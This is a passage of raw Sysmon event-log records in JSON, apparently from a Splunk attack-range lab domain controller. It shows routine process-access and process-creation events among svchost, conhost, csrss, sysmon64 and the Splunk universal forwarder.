C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.163","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6024,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.163\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-03E9-5F25-0000-001073120B00}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.163","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-03E9-5F25-0000-001073120B00}","TargetProcessId":"2292","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6025,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.303\r\nSourceProcessGUID: {A837DB8D-03E9-5F25-0000-001073120B00}\r\nSourceProcessId: 2292\r\nSourceThreadId: 2840\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.303","SourceProcessGUID":"{A837DB8D-03E9-5F25-0000-001073120B00}","SourceProcessId":"2292","SourceThreadId":"2840","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6026,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.913\r\nProcessGuid: {A837DB8D-03E9-5F25-0000-00103D140B00}\r\nProcessId: 4188\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.913","ProcessGuid":"{A837DB8D-03E9-5F25-0000-00103D140B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6027,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.913\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-03E9-5F25-0000-00103D140B00}\r\nTargetProcessId: 4188\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.913","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-03E9-5F25-0000-00103D140B00}","TargetProcessId":"4188","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6028,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.913\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-03E9-5F25-0000-00103D140B00}\r\nTargetProcessId: 4188\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.913","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-03E9-5F25-0000-00103D140B00}","TargetProcessId":"4188","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6029,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.913\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.913","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6030,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.913\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.913","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6031,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.913\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.913","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6032,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.913\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 